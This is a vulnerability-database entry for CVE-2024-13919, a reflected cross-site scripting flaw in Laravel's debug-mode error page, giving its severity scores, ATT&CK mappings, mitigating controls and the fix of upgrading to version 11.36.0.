Cyber Resilience

CVE-2024-13919

HighPublic PoC

Published: 10 March 2025

Published
10 March 2025
Modified
24 March 2025
KEV Added
Patch
CVSS Score v3.1 8.0 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
EPSS Score 0.0035 57.5th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-13919 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Laravel Framework. Its CVSS base score is 8.0 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Spearphishing Link (T1566.002); ranked in the top 42.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-11 (Error Handling) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2024-13919 is a reflected cross-site scripting (XSS) vulnerability affecting the Laravel framework in versions 11.9.0 through 11.35.1. The issue stems from improper encoding of route parameters when displayed on the debug-mode error page, allowing malicious scripts to be injected and executed. It carries a CVSS v3.1 base score of 8.0 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N) and maps to CWE-79.

An unauthenticated remote attacker can exploit this vulnerability by tricking a user into accessing a specially crafted URL that triggers an error page in debug mode. The unencoded route parameter reflects the attacker's payload, enabling script execution in the victim's browser context with high confidentiality and integrity impacts, such as session hijacking or data theft, though it requires user interaction and high attack complexity.

Mitigation involves upgrading to Laravel framework version 11.36.0 or later, where the fix is implemented via pull request #53869 on GitHub. Further details on the vulnerability and remediation are provided in the SBA advisory at sbaresearch GitHub and the oss-security mailing list announcement.

EU & UK References

Vulnerability details

The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible to reflected cross-site scripting due to an improper encoding of route parameters in the debug-mode error page.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1566.002 Spearphishing Link Initial Access
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.
T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Why these techniques?

Reflected XSS via crafted URL enables spearphishing link delivery (T1566.002) and facilitates browser session hijacking or cookie theft for data/session impacts (T1185).

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2024-13918Same product: Laravel Framework
CVE-2025-27515Same product: Laravel Framework
CVE-2025-23547Shared CWE-79
CVE-2024-47002Shared CWE-79
CVE-2025-67978Shared CWE-79
CVE-2025-22498Shared CWE-79
CVE-2025-23904Shared CWE-79
CVE-2025-22754Shared CWE-79
CVE-2025-22682Shared CWE-79
CVE-2025-23593Shared CWE-79

Affected Assets

laravel
framework
11.9.0 — 11.36.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Mandates output filtering and encoding of route parameters on the debug error page to directly prevent reflected XSS script execution.

prevent

Ensures error handling on debug-mode pages does not compromise security by reflecting unencoded user inputs.

prevent

Requires identification, reporting, and correction of the encoding flaw through patching to Laravel 11.36.0 or later.

References